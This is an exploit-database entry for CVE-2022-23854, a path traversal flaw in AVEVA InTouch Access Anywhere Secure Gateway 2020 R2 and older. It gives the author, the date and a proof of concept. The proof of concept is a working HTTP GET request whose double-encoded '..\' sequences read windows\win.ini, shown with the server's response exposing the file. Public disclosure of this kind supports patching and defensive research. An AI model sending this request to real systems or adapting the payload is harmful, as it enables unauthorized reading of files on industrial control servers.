AVEVA InTouch Access Anywhere Secure Gateway 2020 R2 - Path Traversal

EDB-ID:

51028




Platform:

Hardware

Date:

2022-11-11


Exploit Title: AVEVA InTouch Access Anywhere Secure Gateway 2020 R2 - Path Traversal
Exploit Author: Jens Regel (CRISEC IT-Security)
Date: 11/11/2022
CVE: CVE-2022-23854
Version: Access Anywhere Secure Gateway versions 2020 R2 and older

Proof of Concept:
GET 
/AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini 
HTTP/1.1

HTTP/1.1 200 OK
Server: EricomSecureGateway/8.4.0.26844.*
(..)

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1